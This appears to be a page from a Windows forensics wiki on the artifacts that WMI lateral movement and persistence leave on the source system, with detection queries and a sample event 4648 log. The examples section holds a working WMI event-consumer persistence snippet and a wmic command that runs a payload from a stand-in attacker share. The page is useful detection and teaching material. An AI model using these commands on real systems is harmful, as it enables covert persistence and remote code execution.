🖥️
Windows DFIR
  • Introduction
  • Windows Artifacts
    • Windows Quick Tips
      • Windows Command Line
      • Workstation File/Folder Locations
      • Server File/Folder Locations
    • Account Usage
      • Authentications SAM Artifacts
        • Last Login
        • Last Failed Login
        • Last Password Change
      • Authentications (Windows Event Log)
        • Logon ID
      • Group Membership
        • Event ID: 4798
        • Event ID: 4799
      • RDP
        • Source System Artifacts - Quick Reference
        • Destination System Artifacts - Quick Reference
      • SSH
      • Rouge Local Accounts
      • CrowdStrike Searches
        • Event Name - UserLogon
        • Event Name - UserLogonFailed
        • Event Name - UserLogonFailed2
        • Event Name - SsoApplicationAccess
    • Browser Usage
      • History & Downloads
        • Viewing History Files - DB Browser
        • Transition Types
      • Auto-Complete Data
      • Bookmarks
      • Browser Preferences
      • Cache
      • Cookies
      • Extensions
      • Super Cookies (HTML5 Web Storage)
      • Media History
      • Private Browsing
      • Session Restore
      • Stored Credentials
      • Suggested/Frequent Sites
      • DB Browser Queries
        • Firefox
        • Chrome
        • Media History
      • PowerShell Scripts
        • Browser Extension Finder
        • Browser History Finder
    • Processes
      • at.exe
      • explorer.exe
      • lsass.exe
      • lsaiso.exe
      • PuTTy.exe
        • X11 Forwarding
      • runtimebroker.exe
      • services.exe
      • smss.exe
      • System
      • svchost.exe
        • Services
      • winlogon.exe
      • wininit.exe
    • Cloud Storage
    • Deleted File or File Knowledge
      • WordWheelQuery (Win 7+)
      • ACMRU (Win XP)
      • Internet Explorer file:///
      • Last Visited MRU
      • Thumbs.db (Win XP)
      • Thumbcache
      • Recycle Bin
      • User Typed Paths
      • Windows Search Database
    • File Download
      • Zone.Identifer
      • Open/Save Most Recently Used (MRU)
      • Email
      • Drive By Downloads
        • Malvertising
      • Web Browsing
        • Cache Files
      • CrowdStrike Searches
        • MoTW
    • Folder/File Opening/Creation
      • Recent Files
      • Office Recent Files
      • Shell Bags
      • .lnk Files
      • Jump Lists
        • AppIDs
      • Prefetch
      • Index.dat file://
      • PowerShell Scripts
        • .lnk Files
    • Persistence
      • Registry
        • NTUSER.DAT & HKU\SID
        • Run and Run Once
        • Shell Folders and UserInit Key
        • Services
        • Logon Scripts
        • Office Add-ins
        • Winlogon Shell
        • Image File Execution Options (IFEO)
        • AppInit_DLLs
        • Scheduled Tasks
      • Scheduled Tasks
        • Scheduled Task Destination System Artifacts
        • Scheduled Task Source System Artifacts
      • Startup
      • Tool: AutoRuns
      • Accounts
      • WMI Event Consumers
        • WMI: Source System Artifacts
        • WMI: Destination System Artifacts
        • WMI: PowerShell Analysis
      • PowerShell Scripts
        • Startup Programs
      • CrowdStrike Searches
        • Files Written to Startup Folder
        • Files Written to Startup Folder from the Internet
        • Local Account Creation/Deletion
        • Azure Account Creation/Deletion
        • Scheduled Tasks
    • Physical Location
      • Time zone
      • Wireless SSID
      • Network History (Vista/Win7–11)
      • Cookies
      • Browser Search Terms
    • Program Execution
      • Prefetch
        • Decoding Prefetch Files with Eric Zimmerman's PECmd Tool
      • BAM/DAM
      • CapabilityAccessManager
      • UserAssist
      • Last Visited MRU
      • RunMRU
      • MUI Cache
      • ShimCache
      • Amcache
      • Jump Lists
    • Shadow Copies
      • VSC Permissions
      • Event ID 8193: Volume Shadow Copy Service Error
    • USB Usage
      • Key Identification
      • Drive Letter and Volume Name
      • Connection Timestamps
      • User
      • Volume Name
      • Plug & Play Event Log
    • Windows Services
      • DoSvc (Delivery Optimization)
    • System Information
    • Event IDs
      • Authentication / Account
        • 4624 - Authentication Success
          • Logon Types
        • 4625 - Authentication Failure
          • SubStatus Codes
        • 4634 - Account Logoff
        • 4648 - Explicit Credentials Success
        • 4672 - Special Privileges
        • 4720 - Account Creation
        • 4722 - Account Enabled
        • 4732 - Addition to Local Group
        • 4738 - Account Changed
        • 4776 - Kerberos Authentication Attempt
          • Substatus Codes
        • 4771 - Kerberos Failure
        • 4768
      • File System
        • 1006
        • 4688 - Process Created
        • 4663
        • 4656
        • 6416
        • 20001
        • 20003
  • Windows DFIR & MITTR
    • Initial Access
      • Content Injection
      • Drive-by Compromise
        • Watering Hole Attack
        • Microsoft Files (Payload Execution)
        • Exploit Delivery
        • Viewing Browser History Files
      • Phishing
    • Execution
    • Persistence
    • Privilege Escalation
    • Defense Evasion
    • Credential Access
      • Logon ID
    • Discovery
    • Lateral Movement
    • Collection
    • Command and Control
    • Exfiltration
    • Impact
  • SOC Related
    • Cached Credentials
    • Domain Controller Password Spraying
Powered by GitBook
On this page
  • WMI: Source System Artifacts Quick Reference
  • Examples
  • Creating a Malicious Event Consumer:
  • Using wmic to Execute a Remote Payload:
  • Event ID 4648

Was this helpful?

  1. Windows Artifacts
  2. Persistence
  3. WMI Event Consumers

WMI: Source System Artifacts

PreviousWMI Event ConsumersNextWMI: Destination System Artifacts

Last updated 1 year ago

Was this helpful?

WMI: Source System Artifacts Quick Reference

security.evtx:

– Logon specifying alternate credentials

  • Current logged-on User Name

  • Alternate User Name

  • Destination Host Name/IP

  • Process Name

  • – SYSTEM

    • mstsc.exe Remote Desktop Client

  • – SYSTEM – Last Time Executed

    • mstsc.exe Remote Desktop Client

  • – First Time Executed

    • mstsc.exe

  • – C:\Windows\Prefetch

    • wmic.exe-{hash}.pf

Understanding "process call create"

The command "process call create" is used within WMI to instantiate a new process on a local or remote system. It's akin to using PsExec for remote command execution but is native to Windows and leaves fewer artifacts. This command can be invoked via the command line using wmic or through PowerShell with Invoke-WmiMethod, making it a versatile tool for legitimate administration and malicious exploitation alike.

Key Source System Artifacts for WMI Activity

While WMI activity may not always generate clear, easily identifiable artifacts, certain logs and files can provide evidence of such actions:

Event Logs

  • Event ID 4648: Indicates the use of explicit credentials, possibly for remote WMI connections. Monitoring for logon events that precede WMI or PowerShell activity can provide context for potential lateral movement attempts.

  • Microsoft-Windows-WMI-Activity/Operational Log: Starting with Windows Server 2012 R2 and Windows 8.1, this log can contain valuable information about WMI activity, including provider operations and errors which could hint at malicious use.

Registry

  • ShimCache: Found under SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache, this can indicate the execution of wmic.exe, a command-line interface for WMI.

  • BAM/DAM: Background Activity Moderator (BAM) and Desktop Activity Moderator (DAM) registry keys under SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID} can record last execution times of binaries, including wmic.exe.

  • AmCache.hve: Records binaries executed on the system and can be used to identify the first time execution of WMI-related tools or scripts.

File System

  • Prefetch: Windows Prefetch files (C:\Windows\Prefetch) can contain records of wmic.exe execution, providing timestamps that help establish a timeline of WMI command usage.

Additional Artifacts for WMI Analysis

Beyond the basic indicators, several other artifacts can help in the detection and analysis of malicious WMI activity:

  • PowerShell Logs: If enabled, PowerShell logging can capture the execution of WMI commands, including those that utilize "process call create". Script block logging, in particular, is invaluable for capturing the full command that was executed.

  • Network Forensics: Monitoring network traffic for WMI usage (typically over TCP port 135 for RPC and additional dynamic ports) can help identify remote management or lateral movement activities. Encrypted WMI traffic (via WinRM) may require additional inspection techniques.

  • WMI Repository: The WMI repository stores definitions for WMI classes, instances, and Event Consumers. Malicious modifications or additions to the repository can be a sign of persistence mechanisms or other unauthorized activities.

Investigating "process call create" Usage

When investigating the use of "process call create", it's essential to correlate the timing of such commands with other suspicious activities on the system or network. This includes:

  • Reviewing login events and session creations that precede the WMI activity.

  • Checking for the creation or modification of files and processes directly related to the executed command.

  • Analyzing subsequent network connections or security events that might indicate the purpose of the malicious process creation.

Tools and Commands for Investigation

PowerShell provides robust capabilities for querying WMI and investigating related artifacts:

# List WMI Event Consumers
Get-WmiObject -Namespace root\Subscription -Class __EventConsumer

# Check for recent WMIC executions
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache'

# Investigate PowerShell logs for WMI usage
Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | Where-Object { $_.Message -match "Invoke-WmiMethod" -or $_.Message -match "process call create" }

Examples

Creating a Malicious Event Consumer:

This creates an event filter to trigger after the system has been up for 5 minutes and sets a command line event consumer to execute a PowerShell script, binding them together so the script runs whenever the filter's conditions are met.

$Filter=Set-WmiInstance -Namespace root\Subscription -Class __EventFilter -Arguments @{Name='MaliciousFilter'; EventNamespace='root\Cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 300"}
$Consumer=Set-WmiInstance -Namespace root\Subscription -Class CommandLineEventConsumer -Arguments @{Name='MaliciousConsumer'; CommandLineTemplate="powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File 'C:\Path\To\Malicious\Script.ps1'"}
Set-WmiInstance -Namespace root\Subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter; Consumer=$Consumer}

Using wmic to Execute a Remote Payload:

This command uses wmic to remotely create a process on the target host that launches a PowerShell script from a network share controlled by the attacker, demonstrating lateral movement or remote execution capability.

wmic /node:"targetHostName" /user:"username" /password:"password" process call create "cmd.exe /c powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File \\\\attackerHost\\share\\payload.ps1"

Event ID 4648

In this example, the attacker uses wmic.exe to execute a command with explicit credentials targeting another account within the domain. The use of explicit credentials and a tool like wmic.exe for process creation outside of normal administrative activity could be indicative of malicious behavior, especially when originating from unusual source addresses or atypical user accounts.

Event ID: 4648
Subject:
     Security ID: S-1-5-21-123456789-123456789-123456789-1001
     Account Name: AttackerAccount
     Account Domain: COMPROMISED-DOMAIN
     Logon ID: 0x123456
Logon Type: 3
Impersonation Level: Impersonation
Credential Used:
     Target Name: TargetAccount@COMPROMISED-DOMAIN
     Target Domain: COMPROMISED-DOMAIN
Process Information:
     Process ID: 0x1a2b3c
     Process Name: C:\Windows\System32\wbem\wmic.exe
Network Information:
     Workstation Name: COMPROMISED-WORKSTATION
     Source Network Address: 192.168.1.100
     Source Port: 12345
Detailed Authentication Information:
     Logon Process: Advapi
     Authentication Package: Negotiate
     Transited Services: -
     Package Name (NTLM only): -
     Key Length: 0

Event ID 4648
ShimCache
BAM/DAM
AmCache.hve
Prefetch